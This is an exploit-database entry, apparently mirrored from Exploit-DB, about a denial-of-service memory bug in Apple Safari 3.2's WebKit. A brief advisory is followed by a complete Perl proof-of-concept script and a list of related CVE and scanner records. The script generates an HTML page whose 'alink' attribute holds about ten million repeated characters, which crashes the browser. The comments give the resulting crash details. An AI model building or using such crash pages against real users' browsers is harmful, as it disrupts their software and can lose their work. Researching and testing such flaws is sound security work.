Lucene search
Jeremy BrownEDB-ID:32694HistoryJan 01, 2009 - 12:00 a.m.
Apple Safari 3.2 WebKit - 'alink' Property Memory Leak Remote Denial of Service (1)
2009-01-0100:00:00
Jeremy Brown
www.exploit-db.com
23
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/33080/info
Apple Safari is prone to a denial-of-service vulnerability that resides in the WebKit library.
Remote attackers can exploit this issue to crash the affected browser, denial-of-service condition.
Apple Safari 3.2 running on Microsoft Windows Vista is vulnerable; other versions running on different platforms may also be affected.
Note (December 20, 2010): Safari on iOS 4.0.1 is also vulnerable.
#!/usr/bin/perl
# safari_webkit_ml.pl
# Safari (Webkit) 3.2 Remote Memory Leak Exploit
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]
# Access violation when writing to [00000018]
# EIP 6B00A02B WebKit.6B00A02B
# LastError 00000008 ERROR_NOT_ENOUGH_MEMORY
# Memory leaks are common in browsers.. tested on Vista SP1
# Compliments of bf2
$filename = $ARGV[0];
if(!defined($filename))
{
print "Usage: $0 <filename.html>\n";
}
$head = "<html>" . "\n";
$trig = "<body alink=\"" . "A/" x 10000000 . "\">" . "\n";
$foot = "</html>";
$data = $head . $trig . $foot;
open(FILE, '>' . $filename);
print FILE $data;
close(FILE);
exit;Related
cvelist
cvelist
CVE-2008-5821
2009-01-02 19:00:00
prion
prion
Hardcoded credentials
2009-01-02 19:30:00
seebug
seebug
Apple Safari WebKit alink属性内存泄露拒绝服务漏洞
2009-01-05 00:00:00
exploitdb
exploitdb
Apple Safari 3.2 WebKit - 'alink' Property Memory Leak Remote Denial of Service (2)
2009-01-01 00:00:00
Apple Safari 4.0.5 (531.22.7) - Denial of Service
2010-04-26 00:00:00
openvas
openvas
Apple Safari WebKit Property Memory Leak Remote DoS Vulnerability
2009-01-13 00:00:00
Apple Safari WebKit Property Memory Leak Remote DoS Vulnerability
2009-01-13 00:00:00
nvd
nvd
CVE-2008-5821
2009-01-02 19:30:00
cve
cve
CVE-2008-5821
2009-01-02 19:30:00